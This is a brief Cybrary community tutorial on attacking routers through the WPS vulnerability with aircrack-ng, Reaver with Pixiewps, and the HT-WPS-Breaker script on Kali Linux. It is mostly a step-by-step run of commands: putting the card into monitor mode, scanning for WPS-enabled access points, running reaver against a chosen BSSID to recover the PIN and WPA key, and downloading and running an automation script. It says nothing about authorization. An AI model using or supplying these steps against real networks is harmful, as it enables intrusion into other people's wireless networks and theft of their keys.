This Cybrary 0P3N submission will cover how to use tools such as aircrack suite, Reaver, Pixiewps, & HT-WPS#B to exploit a WPS vulnerability in certain routers.This attack is carried out on a Machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B).
Here is a list of vulnerable routers:Spreadsheet of Routers Vulnerable to WPS Exploit
To start, open a terminal as root and run the following commands.
apt-get install reaver aircrack-ng
Once you have ran the following commands, we will use airmon-ng to set our wireless card into monitor mode. (Must have a wireless card capable of packet injection)
First we will check for any interfering processes by using the following command.
If processes were found, use the following command to kill them.
airmon-ng check kill
Now to set the card to monitor mode.
airmon-ng start wlan0
Next we will use airodump-ng to scan for wireless access points with WPS enabled.
airodump-ng wlan0mon --wps
Once airodump has found the AP you are attacking, press ctrl+C to stop, then copy down the BSSID & Channel#.Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.
reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1
-i specifies the interface used-c specifies the channel of the AP. Replace# with the channel number.-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.You can also time the reaver process by using the following command.
time reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1
If successful, the WPS pin will be passed to reaver and the WPA key will be discovered. Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process. Using HT-WPS-Breaker to automate the process.
To install, CLICK HERE
then drag the .zip to your desktop and run the following commands.
- cd Desktop
- unzip HT-WPS-Breaker-master.zip
- cd HT-WPS-Breaker-master
- chmod +x HT-WB.sh
- ./HT-WB.sh or bash HT-WB.sh
This concludes a simple write up of how to use Reaver and other tools to attack a WPS enabled AP.I have had many questions on how to use Reaver so I hope this helps.Comment below if you have any questions. (Please keep comments in regards to the topic).~Evox